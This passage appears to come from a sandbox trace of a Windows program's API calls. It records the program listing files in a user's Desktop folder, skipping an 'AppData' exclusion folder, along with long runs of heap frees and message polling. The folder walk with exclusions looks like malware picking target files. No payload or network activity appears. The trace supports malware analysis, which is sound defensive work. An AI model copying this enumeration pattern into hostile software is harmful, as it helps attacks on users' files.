cFileName="LtZ4mBBPXnfPFiN1jbH3", cAlternateFileName="LTZ4MB~1")) returned 1 [0157.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.248] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LtZ4mBBPXnfPFiN1jbH3", cchCount1=20, lpString2="AppData", cchCount2=7) returned 3 [0157.248] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.249] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf91c4650, ftCreationTime.dwHighDateTime=0x1d5ddd5, ftLastAccessTime.dwLowDateTime=0x80d0ad70, ftLastAccessTime.dwHighDateTime=0x1d5dde0, ftLastWriteTime.dwLowDateTime=0x80d0ad70, ftLastWriteTime.dwHighDateTime=0x1d5dde0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.249] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf91c4650, ftCreationTime.dwHighDateTime=0x1d5ddd5, ftLastAccessTime.dwLowDateTime=0x80d0ad70, ftLastAccessTime.dwHighDateTime=0x1d5dde0, ftLastWriteTime.dwLowDateTime=0x80d0ad70, ftLastWriteTime.dwHighDateTime=0x1d5dde0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.249] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x266210e0, ftCreationTime.dwHighDateTime=0x1d5e0d3, ftLastAccessTime.dwLowDateTime=0xcfa2aa80, ftLastAccessTime.dwHighDateTime=0x1d5dace, ftLastWriteTime.dwLowDateTime=0xcfa2aa80, ftLastWriteTime.dwHighDateTime=0x1d5dace, nFileSizeHigh=0x0, nFileSizeLow=0xf55d, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="qPUo-BPNhJloiyjRuI7.mp4", cAlternateFileName="QPUO-B~1.MP4")) returned 1 [0157.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0157.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e90 [0157.249] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e10 [0157.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ea0 [0157.249] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.249] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.249] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.249] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.249] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.250] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.250] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.250] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.250] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee7b3530, ftCreationTime.dwHighDateTime=0x1d5e6c7, ftLastAccessTime.dwLowDateTime=0x28370490, ftLastAccessTime.dwHighDateTime=0x1d5dd89, ftLastWriteTime.dwLowDateTime=0x28370490, ftLastWriteTime.dwHighDateTime=0x1d5dd89, nFileSizeHigh=0x0, nFileSizeLow=0x13156, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="URxyJ_reG.mp3", cAlternateFileName="URXYJ_~1.MP3")) returned 1 [0157.250] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.250] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.250] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.250] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.250] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.250] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.250] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x12a006a, ftCreationTime.dwLowDateTime=0x3e6f, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x15, ftLastWriteTime.dwHighDateTime=0x116006b, nFileSizeHigh=0x3e6f, nFileSizeLow=0x909410, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="UR\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.250] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.250] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.250] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ea0 | out: hHeap=0x8a0000) returned 1 [0157.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0157.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0157.251] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db330 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0f0 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba798 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba858 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e20 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba840 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e70 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1de0 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba828 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba888 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba870 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e50 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e90 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba7e0 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba7c8 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba7b0 | out: hHeap=0x8a0000) returned 1 [0157.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba810 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba7f8 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e30 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6f0 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e40 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba738 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba768 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.252] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.252] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.252] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e40 | out: hHeap=0x8a0000) returned 1 [0157.252] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa07af50, ftCreationTime.dwHighDateTime=0x1d5dc36, ftLastAccessTime.dwLowDateTime=0x836c1090, ftLastAccessTime.dwHighDateTime=0x1d5e62a, ftLastWriteTime.dwLowDateTime=0x836c1090, ftLastWriteTime.dwHighDateTime=0x1d5e62a, nFileSizeHigh=0x0, nFileSizeLow=0xd79a, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="mKicOCoALM.flv", cAlternateFileName="MKICOC~1.FLV")) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba768 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e40 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba738 | out: hHeap=0x8a0000) returned 1 [0157.253] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e40 | out: hHeap=0x8a0000) returned 1 [0157.253] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e40 | out: hHeap=0x8a0000) returned 1 [0157.253] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba768 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba768 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e40 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba738 | out: hHeap=0x8a0000) returned 1 [0157.253] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.253] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.253] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e40 | out: hHeap=0x8a0000) returned 1 [0157.254] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4ff6880, ftCreationTime.dwHighDateTime=0x1d5df51, ftLastAccessTime.dwLowDateTime=0x458ca660, ftLastAccessTime.dwHighDateTime=0x1d5dc69, ftLastWriteTime.dwLowDateTime=0x458ca660, ftLastWriteTime.dwHighDateTime=0x1d5dc69, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="NA3pEcvaltBR8VLK", cAlternateFileName="NA3PEC~1")) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba738 | out: hHeap=0x8a0000) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e40 | out: hHeap=0x8a0000) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba768 | out: hHeap=0x8a0000) returned 1 [0157.254] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e40 | out: hHeap=0x8a0000) returned 1 [0157.254] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e40 | out: hHeap=0x8a0000) returned 1 [0157.254] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.254] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.254] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e90 | out: hHeap=0x8a0000) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e90 | out: hHeap=0x8a0000) returned 1 [0157.254] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e50 | out: hHeap=0x8a0000) returned 1 [0157.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NA3pEcvaltBR8VLK", cchCount1=16, lpString2="AppData", cchCount2=7) returned 3 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6f0 | out: hHeap=0x8a0000) returned 1 [0157.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e90 | out: hHeap=0x8a0000) returned 1 [0157.255] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0157.255] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e90 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db330 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e30 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 